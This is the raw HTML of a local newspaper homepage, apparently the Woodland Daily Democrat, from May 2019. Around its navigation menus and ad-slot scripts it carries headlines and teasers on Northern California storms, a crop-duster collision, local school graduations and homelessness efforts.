href="https://www.dailydemocrat.com/news/local-news/">Local News</a></li> <li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93 menu-large"><a href="https://www.dailydemocrat.com/news/business/">Business</a></li> <li id="menu-item-2563730" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2563730 menu-large"><a href="https://www.dailydemocrat.com/woodland-daily-democrat-mobile-alerts-signup/">News Alerts</a></li> <li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94 menu-large"><a href="https://www.dailydemocrat.com/news/crime-public-safety/">Crime &amp; Public Safety</a></li> <li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95 menu-large"><a href="https://www.dailydemocrat.com/news/uc-davis/">UC Davis</a></li> <li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96 menu-large"><a href="https://www.dailydemocrat.com/news/agriculture/">Agriculture</a></li> <li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97 menu-large"><a href="https://www.dailydemocrat.com/news/state/">State</a></li> <li id="menu-item-98" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-98 menu-large"><a href="https://www.dailydemocrat.com/weather/">Weather</a></li> </ul> </li> <li id="menu-item-99" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-99 menu-large"><a href="https://www.dailydemocrat.com/sports/">Sports</a> <ul class="sub-menu"> <li id="menu-item-100" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-100 menu-large"><a href="https://www.dailydemocrat.com/sports/">Sports</a></li> <li id="menu-item-101" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-101 menu-large"><a href="https://www.dailydemocrat.com/sports/local-sports/">Local Sports</a></li> <li id="menu-item-170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-170 menu-large"><a href="/tag/uc-davis-aggies/">UC Davis Aggies</a></li> <li id="menu-item-104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-104 menu-large"><a href="https://www.dailydemocrat.com/sports/mlb/oakland-athletics/">Oakland Athletics</a></li> <li id="menu-item-105" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-105 menu-large"><a href="https://www.dailydemocrat.com/sports/nfl/oakland-raiders/">Oakland Raiders</a></li> <li id="menu-item-106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106 menu-large"><a href="https://www.dailydemocrat.com/sports/nfl/san-francisco-49ers/">San Francisco 49ers</a></li> <li id="menu-item-107" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-107 menu-large"><a href="https://www.dailydemocrat.com/sports/mlb/san-francisco-giants/">San Francisco Giants</a></li> <li id="menu-item-108" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-108 menu-large"><a href="https://www.dailydemocrat.com/sports/nhl/san-jose-sharks/">San Jose Sharks</a></li> <li id="menu-item-109" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-109 menu-large"><a href="https://www.dailydemocrat.com/sports/nba/golden-state-warriors/">Golden State Warriors</a></li> </ul> </li> <li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-110 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/">Lifestyle</a> <ul class="sub-menu"> <li id="menu-item-111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/">Lifestyle</a></li> <li id="menu-item-2509773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2509773 menu-large"><a href="https://www.dailydemocrat.com/entertainment/">Entertainment</a></li> <li id="menu-item-113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-113 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/health/">Health</a></li> <li id="menu-item-114" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-114 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/home-garden/">Home &amp; Garden</a></li> <li id="menu-item-116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-116 menu-large"><a href="https://www.dailydemocrat.com/movies-tv/">Movies &amp; TV</a></li> <li id="menu-item-117" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-117 menu-large"><a href="https://www.dailydemocrat.com/entertainment/food-drink/">Food &amp; Drink</a></li> <li id="menu-item-2537908" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2537908 menu-large"><a href="https://comicskingdom.com/?utm_source=dfm">Comics</a></li> <li id="menu-item-2537909" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2537909 menu-large"><a href="http://puzzles.comicskingdom.com/?utm_source=dfm">Puzzles</a></li> </ul> </li> <li id="menu-item-118" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-118 menu-large"><a href="#">Obituaries</a> <ul class="sub-menu"> <li id="menu-item-119" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-119 menu-large"><a href="http://www.legacy.com/obituaries/dailydemocrat/">Obituaries</a></li> <li id="menu-item-120" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-120 menu-large"><a href="http://adportal.northvalleyclassifieds.com/norcal-adportal/obits/index.html">Place an Obit</a></li> </ul> </li> <li id="menu-item-121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-121 menu-large"><a href="https://www.dailydemocrat.com/opinion/">Opinion</a> <ul class="sub-menu"> <li id="menu-item-122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-122 menu-large"><a href="https://www.dailydemocrat.com/opinion/">Opinion</a></li> <li id="menu-item-164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-164 menu-large"><a href="https://www.dailydemocrat.com/opinion/columnists/">Columnists</a></li> <li id="menu-item-124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-124 menu-large"><a href="https://www.dailydemocrat.com/opinion/editorials/">Editorials</a></li> <li id="menu-item-125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-125 menu-large"><a href="https://www.dailydemocrat.com/opinion/letters/">Letters</a></li> </ul> </li> <li id="menu-item-2581345" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2581345 menu-large"><a href="#">Advertising</a> <ul class="sub-menu"> <li id="menu-item-2581346" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581346 menu-large"><a href="http://www.norcalaudiencesolutions.com/">Advertise with us</a></li> <li id="menu-item-2581347" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581347 menu-large"><a href="http://marketplace.dailydemocrat.com/woodland">Classifieds</a></li> <li id="menu-item-2581348" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581348 menu-large"><a href="https://businessdirectory.dailydemocrat.com/marketplace/">Local Guide</a></li> <li id="menu-item-2581349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581349 menu-large"><a href="https://www.dailydemocrat.com/jobs/">Jobs</a></li> <li id="menu-item-2581350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581350 menu-large"><a href="https://www.gomnlt.com/dfm/daily-democrat/?utm_source=daily-democrat&#038;utm_medium=navweblink&#038;utm_campaign=dfm">Freelance Jobs</a></li> <li id="menu-item-2581351" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581351 menu-large"><a href="http://homesforsale.dailydemocrat.com/">Real Estate</a></li> <li id="menu-item-2581352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581352 menu-large"><a href="https://businessdirectory.dailydemocrat.com/marketplace/todays_ads/">Today&#8217;s Ads</a></li> <li id="menu-item-2581353" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581353 menu-large"><a href="https://www.dailydemocrat.com/special-sections/">Special Sections</a></li> </ul> </li> <li id="menu-item-2529957" class="menu-large modern-earthy-width subscribe-special menu-item menu-item-type-custom menu-item-object-custom menu-item-2529957"><a href="https://checkout.dailydemocrat.com/">SUBSCRIBE NOW</a></li> </ul> </nav> <div id="page" class="hfeed site"> <div id="web-push-prompt" class="alert-bar" style="background-color: #000000;"> <div class="alert-bar-wrapper"> <div class="alert-bar-message"> <p style="color: #FFFFFF;" onclick="DfmWebPush.doRegisterPushPermission();"> GET BREAKING NEWS IN YOUR BROWSER. CLICK HERE TO TURN ON NOTIFICATIONS. </p> </div> <div class="alert-bar-close"> <p style="color: #FFFFFF;" onclick="DfmWebPush.closePushPrompt();" >X </p> </div> </div> </div> <div class="header-placeholder"></div><header class="site-header default headroom--top"> <form class="search-form slide-search" method="GET" action="https://www.dailydemocrat.com/"> <input type="text" placeholder="Search" name="s"> <input name="orderby" type="hidden" value="date"/> <input name="order" type="hidden" value="desc"/> <input type="submit" value="submit"> </form> <div class="nav-wrapper"> <div class="nav-primary"> <div class="navigation-inner"> <span class="icon-hamburger"></span><h1 class="custom-logo logo"><a href="https://www.dailydemocrat.com"><img src="https://www.dailydemocrat.com/wp-content/uploads/2018/08/WDD_main.svg" alt="Daily Democrat"></a></h1> <div class="status-bar"> <div class="status-bar-wrapper"> <ul id="status-bar-menu" class="status-bar-menu"><li id="menu-item-88" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-88"><a href="https://www.dailydemocrat.com/weather/">Weather</a></li> <li id="menu-item-89" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-89"><a href="https://myaccount.dailydemocrat.com/Access.aspx?product=eEditionWD&#038;premium=y">E-Edition</a></li> <li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-90"><a href="https://myaccount.dailydemocrat.com">Subscribe</a></li> <li id="menu-item-178" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-178"><a href="https://www.dailydemocrat.com/newsletter/">Sign Up For Newsletters</a></li> <li id="menu-item-2529958" class="status-button status-subscribe menu-item menu-item-type-custom menu-item-object-custom menu-item-2529958"><a href="https://checkout.dailydemocrat.com/">SUBSCRIBE NOW</a></li> </ul> </div> </div> <form class="search-form header-search" method="GET" action="https://www.dailydemocrat.com/"> <input type="text" placeholder="Search" name="s"> <input name="orderby" type="hidden" value="date"/> <input name="order" type="hidden" value="desc"/> <input type="submit" value="submit"> </form> <span class="icon-search"></span><nav class="menu-main-navigation-container"><ul id="primary-menu" class="menu"><li id="menu-item-166" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-166 menu-large"><a href="https://www.dailydemocrat.com/news/">News</a> <ul class="sub-menu"> <li id="menu-item-167" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-167 menu-large"><a href="https://www.dailydemocrat.com/news/local-news/">Local News</a></li> <li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-93 menu-large"><a href="https://www.dailydemocrat.com/news/business/">Business</a></li> <li id="menu-item-2563730" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2563730 menu-large"><a href="https://www.dailydemocrat.com/woodland-daily-democrat-mobile-alerts-signup/">News Alerts</a></li> <li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94 menu-large"><a href="https://www.dailydemocrat.com/news/crime-public-safety/">Crime &amp; Public Safety</a></li> <li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95 menu-large"><a href="https://www.dailydemocrat.com/news/uc-davis/">UC Davis</a></li> <li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96 menu-large"><a href="https://www.dailydemocrat.com/news/agriculture/">Agriculture</a></li> <li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97 menu-large"><a href="https://www.dailydemocrat.com/news/state/">State</a></li> <li id="menu-item-98" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-98 menu-large"><a href="https://www.dailydemocrat.com/weather/">Weather</a></li> </ul> </li> <li id="menu-item-99" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-99 menu-large"><a href="https://www.dailydemocrat.com/sports/">Sports</a> <ul class="sub-menu"> <li id="menu-item-100" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-100 menu-large"><a href="https://www.dailydemocrat.com/sports/">Sports</a></li> <li id="menu-item-101" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-101 menu-large"><a href="https://www.dailydemocrat.com/sports/local-sports/">Local Sports</a></li> <li id="menu-item-170" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-170 menu-large"><a href="/tag/uc-davis-aggies/">UC Davis Aggies</a></li> <li id="menu-item-104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-104 menu-large"><a href="https://www.dailydemocrat.com/sports/mlb/oakland-athletics/">Oakland Athletics</a></li> <li id="menu-item-105" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-105 menu-large"><a href="https://www.dailydemocrat.com/sports/nfl/oakland-raiders/">Oakland Raiders</a></li> <li id="menu-item-106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106 menu-large"><a href="https://www.dailydemocrat.com/sports/nfl/san-francisco-49ers/">San Francisco 49ers</a></li> <li id="menu-item-107" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-107 menu-large"><a href="https://www.dailydemocrat.com/sports/mlb/san-francisco-giants/">San Francisco Giants</a></li> <li id="menu-item-108" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-108 menu-large"><a href="https://www.dailydemocrat.com/sports/nhl/san-jose-sharks/">San Jose Sharks</a></li> <li id="menu-item-109" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-109 menu-large"><a href="https://www.dailydemocrat.com/sports/nba/golden-state-warriors/">Golden State Warriors</a></li> </ul> </li> <li id="menu-item-110" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-110 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/">Lifestyle</a> <ul class="sub-menu"> <li id="menu-item-111" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-111 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/">Lifestyle</a></li> <li id="menu-item-2509773" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2509773 menu-large"><a href="https://www.dailydemocrat.com/entertainment/">Entertainment</a></li> <li id="menu-item-113" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-113 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/health/">Health</a></li> <li id="menu-item-114" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-114 menu-large"><a href="https://www.dailydemocrat.com/lifestyle/home-garden/">Home &amp; Garden</a></li> <li id="menu-item-116" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-116 menu-large"><a href="https://www.dailydemocrat.com/movies-tv/">Movies &amp; TV</a></li> <li id="menu-item-117" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-117 menu-large"><a href="https://www.dailydemocrat.com/entertainment/food-drink/">Food &amp; Drink</a></li> <li id="menu-item-2537908" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2537908 menu-large"><a href="https://comicskingdom.com/?utm_source=dfm">Comics</a></li> <li id="menu-item-2537909" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2537909 menu-large"><a href="http://puzzles.comicskingdom.com/?utm_source=dfm">Puzzles</a></li> </ul> </li> <li id="menu-item-118" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-118 menu-large"><a href="#">Obituaries</a> <ul class="sub-menu"> <li id="menu-item-119" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-119 menu-large"><a href="http://www.legacy.com/obituaries/dailydemocrat/">Obituaries</a></li> <li id="menu-item-120" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-120 menu-large"><a href="http://adportal.northvalleyclassifieds.com/norcal-adportal/obits/index.html">Place an Obit</a></li> </ul> </li> <li id="menu-item-121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-121 menu-large"><a href="https://www.dailydemocrat.com/opinion/">Opinion</a> <ul class="sub-menu"> <li id="menu-item-122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-122 menu-large"><a href="https://www.dailydemocrat.com/opinion/">Opinion</a></li> <li id="menu-item-164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-164 menu-large"><a href="https://www.dailydemocrat.com/opinion/columnists/">Columnists</a></li> <li id="menu-item-124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-124 menu-large"><a href="https://www.dailydemocrat.com/opinion/editorials/">Editorials</a></li> <li id="menu-item-125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-125 menu-large"><a href="https://www.dailydemocrat.com/opinion/letters/">Letters</a></li> </ul> </li> <li id="menu-item-2581345" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2581345 menu-large"><a href="#">Advertising</a> <ul class="sub-menu"> <li id="menu-item-2581346" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581346 menu-large"><a href="http://www.norcalaudiencesolutions.com/">Advertise with us</a></li> <li id="menu-item-2581347" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581347 menu-large"><a href="http://marketplace.dailydemocrat.com/woodland">Classifieds</a></li> <li id="menu-item-2581348" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581348 menu-large"><a href="https://businessdirectory.dailydemocrat.com/marketplace/">Local Guide</a></li> <li id="menu-item-2581349" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581349 menu-large"><a href="https://www.dailydemocrat.com/jobs/">Jobs</a></li> <li id="menu-item-2581350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581350 menu-large"><a href="https://www.gomnlt.com/dfm/daily-democrat/?utm_source=daily-democrat&#038;utm_medium=navweblink&#038;utm_campaign=dfm">Freelance Jobs</a></li> <li id="menu-item-2581351" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581351 menu-large"><a href="http://homesforsale.dailydemocrat.com/">Real Estate</a></li> <li id="menu-item-2581352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2581352 menu-large"><a href="https://businessdirectory.dailydemocrat.com/marketplace/todays_ads/">Today&#8217;s Ads</a></li> <li id="menu-item-2581353" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2581353 menu-large"><a href="https://www.dailydemocrat.com/special-sections/">Special Sections</a></li> </ul> </li> <li id="menu-item-2529957" class="menu-large modern-earthy-width subscribe-special menu-item menu-item-type-custom menu-item-object-custom menu-item-2529957"><a href="https://checkout.dailydemocrat.com/">SUBSCRIBE NOW</a></li> </ul></nav><div id="div-gpt-ad-Sponsorship_1" class="dfp-ad dfp-Sponsorship_1" data-ad-unit="Sponsorship_1"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-Sponsorship_1"); } ); } </script> </div> </div> </div> <div class="widget widget-trending-stories"><div class="trending-bar trending"> <div class="trending-bar-wrapper"> <p class="label"> Trending: </p> <nav> <ul> <li class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/pge-lines-officially-caused-camp-fire-cal-fire-says/" title="Cal Fire investigation determines PG&amp;E lines caused Camp Fire"> <span class="dfm-title"> PG&amp;E lines sparked Camp Fire </span> </a> </li> <li class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/13/3-students-charged-in-woodland-high-shooting-scare/" title="3 Woodland High students arrested in shooting scare"> <span class="dfm-title"> Woodland students arrested </span> </a> </li> <li class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/woodland-schools-gearing-up-for-promotions-and-graduations/" title="Woodland schools gearing up for promotions and graduations"> <span class="dfm-title"> Schedule local graduations </span> </a> </li> <li class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/13/fatal-davis-freeway-crash-kills-3-injures-1/" title="Fatal Davis freeway crash kills 3, injures 1"> <span class="dfm-title"> Fatal Davis crash </span> </a> </li> <li class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/public-private-collaborations-formed-to-combat-homelessness/" title="Public, private collaborations formed to combat homelessness in Woodland"> <span class="dfm-title"> Homelessness in Woodland </span> </a> </li> </ul> </nav> </div> </div> </div> </div> </header> <div id="content" class="site-content"> <div class="header-banners"> <div id="div-gpt-ad-interstitial" class="dfp-ad dfp-interstitial" data-ad-unit="interstitial"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-interstitial"); } ); } </script> </div> <div id="div-gpt-ad-top_leaderboard" class="dfp-ad dfp-top_leaderboard" data-ad-unit="top_leaderboard"> <script type="text/javascript"> if ( "undefined" !== typeof googletag ) { googletag.cmd.push( function() { googletag.display("div-gpt-ad-top_leaderboard"); } ); } </script> </div> </div> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <div class="page-content homepage landing"> <section class="feature-primary feature-headline busy"> <div class="feature-wrapper"> <div class="feature-left"> <div class="feature-top"> <article class=" feature-large archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587781" data-timestamp="1557984841"> <div class="article-info"> <header> <h2 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/yosemite-road-to-close-ahead-of-snowstorms/" title="Storms bring winter conditions to NorCal"> <span class="dfm-title"> Storms bring winter conditions to NorCal </span> </a> </h2> <figure> <a href="https://www.dailydemocrat.com/2019/05/16/yosemite-road-to-close-ahead-of-snowstorms/" title="Storms bring winter conditions to NorCal" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/16/yosemite-road-to-close-ahead-of-snowstorms/" title="Storms bring winter conditions to NorCal"> <div class="image-wrapper"><img alt="Storms bring winter conditions to NorCal" title="Storms bring winter conditions to NorCal" class="lazyload size-hp_large" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=565" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=565 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=710 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=613 675w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=784 865w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=565 622w" ></div> </a> </figure> </header> <div class="excerpt"> A cold front that started dumping rain and snow in Northern California Wednesday prompted the closure of a popular road at Yosemite National Park and left outdoor businesses bracing for smaller crowds through the weekend. The first storm heading toward the state from the Gulf of Alaska brought rain to the valley and winter conditions, with up to an inch... </div> </div><!-- .article-info --> <figure> <div class="image-wrapper"><a href="https://www.dailydemocrat.com/2019/05/16/yosemite-road-to-close-ahead-of-snowstorms/" ><img alt="" title="" class="lazyload size-article_feature" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=565" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=565 620w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=710 780w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=928 1020w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/California_Storms_084851.jpg?w=855 940w" ></a></div> </figure> </article> </div> <div class="feature-bottom"> <article class=" feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587783" data-timestamp="1557984884"> <figure> <a href="https://www.dailydemocrat.com/2019/05/16/authorities-2-pilots-killed-as-crop-dusting-planes-collide/" title="2 pilots killed as crop-dusting planes collide in Yuba County" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/16/authorities-2-pilots-killed-as-crop-dusting-planes-collide/" title="2 pilots killed as crop-dusting planes collide in Yuba County"> <div class="image-wrapper"><img alt="2 pilots killed as crop-dusting planes collide in Yuba County" title="2 pilots killed as crop-dusting planes collide in Yuba County" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=283" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=283 300w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=326 380w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=337 395w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=402 470w,https://www.dailydemocrat.com/wp-content/uploads/2019/05/Crop_Dusters_Collide_59481.jpg?w=261 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/16/authorities-2-pilots-killed-as-crop-dusting-planes-collide/" title="2 pilots killed as crop-dusting planes collide in Yuba County"> <span class="dfm-title"> 2 pilots killed as crop-dusting planes collide in Yuba County </span> </a> </h5> </header> </div><!-- .article-info --> </article> <article class=" feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2587557" data-timestamp="1557927882"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/finalists-for-woodland-community-college-president-position-interviewed/" title="Finalists for Woodland Community College president position interviewed" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/15/finalists-for-woodland-community-college-president-position-interviewed/" title="Finalists for Woodland Community College president position interviewed"> <div class="image-wrapper"><img alt="Finalists for Woodland Community College president position interviewed" title="Finalists for Woodland Community College president position interviewed" class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=286" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=286 300w,https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=329 380w,https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=339 395w,https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=405 470w,https://www.dailydemocrat.com/wp-content/uploads/migration/2018/201802/NEWS_180209928_AR_0_YPBUSGKMGSZG.jpg?w=263 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/finalists-for-woodland-community-college-president-position-interviewed/" title="Finalists for Woodland Community College president position interviewed"> <span class="dfm-title"> Finalists for Woodland Community College president position interviewed </span> </a> </h5> </header> </div><!-- .article-info --> </article> <article class=" feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2586142" data-timestamp="1557921493"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/woodland-schools-gearing-up-for-promotions-and-graduations/" title="Woodland schools gearing up for promotions and graduations" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/15/woodland-schools-gearing-up-for-promotions-and-graduations/" title="Woodland schools gearing up for promotions and graduations"> <div class="image-wrapper"><img alt="Spring commencements are just around the corner for Woodland’s high schools and community college — as well as schools in the surrounding area. Not to be forgotten, local middle schools are also gearing up for their promotion ceremonies." title="Spring commencements are just around the corner for Woodland’s high schools and community college — as well as schools in the surrounding area. Not to be forgotten, local middle schools are also gearing up for their promotion ceremonies." class="lazyload size-hp_small" data-sizes="auto" data-src="https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=286" data-srcset="https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=286 300w,https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=329 380w,https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=339 395w,https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=405 470w,https://www.dailydemocrat.com/wp-content/uploads/migration/2017/201705/NEWS_170529912_EP_-1_NJDUBBGRREUK.jpg?w=263 305w" ></div> </a> </figure> <div class="article-info"> <header> <h5 class="entry-title"> <a class="article-title" href="https://www.dailydemocrat.com/2019/05/15/woodland-schools-gearing-up-for-promotions-and-graduations/" title="Woodland schools gearing up for promotions and graduations"> <span class="dfm-title"> Woodland schools gearing up for promotions and graduations </span> </a> </h5> </header> </div><!-- .article-info --> </article> <article class=" feature-small archive-view has-image post-2587865 post type-post status-publish format-standard has-post-thumbnail hentry category-business category-news location-california location-orange-county" data-id="2586545" data-timestamp="1557902203"> <figure> <a href="https://www.dailydemocrat.com/2019/05/15/public-private-collaborations-formed-to-combat-homelessness/" title="Public, private collaborations formed to combat homelessness in Woodland" class=""></a> <a href="https://www.dailydemocrat.com/2019/05/15/public-private-collaborations-formed-to-combat-homelessness/" title="Public, private collaborations formed to combat homelessness in Woodland"> <div 